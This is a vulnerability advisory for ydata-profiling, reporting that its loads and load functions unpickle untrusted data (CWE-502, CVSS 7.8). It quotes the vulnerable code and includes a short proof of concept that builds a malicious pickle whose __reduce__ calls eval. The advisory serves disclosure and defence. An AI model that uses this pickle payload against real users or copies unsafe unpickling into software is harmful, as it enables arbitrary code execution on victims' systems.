Pickle Load in Serialized Profile Load

Products Impacted

This vulnerability is present in Ydata-profiling v3.7.0 or newer.

CVSS Score: 7.8

AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-502: Deserialization of Untrusted Data.

Details

In src/ydata_profiling/serialize_report.py pickle is used to load serialized profiles within the loads function. The load function relies on the loads function and is therefore also vulnerable:

def loads(self, data: bytes) -> Union["ProfileReport", "SerializeReport"]:
        """
        Deserialize the serialized report

        Args:
            data: The bytes of a serialize ProfileReport object.

        Raises:
            ValueError: if ignore_config is set to False and the configs do not match.

        Returns:
            self
        """
        import pickle

        try:
            (
                df_hash,
                loaded_config,
                loaded_description_set,
                loaded_report,
            ) = pickle.loads(data)

This can be abused by generating a malicious pickle and using the load or loads functions:

from ydata_profiling import ProfileReport
import pickle

class Exploit:
    def __reduce__(self):
        return eval, ("print('pwned')",)

profile = ProfileReport().loads(pickle.dumps(Exploit()))

In the example above we pickle dumps directly into the loads function, in a real attack the user would be affected by the load function or by passing the bytes into the loads function after reading them from a file or over the network.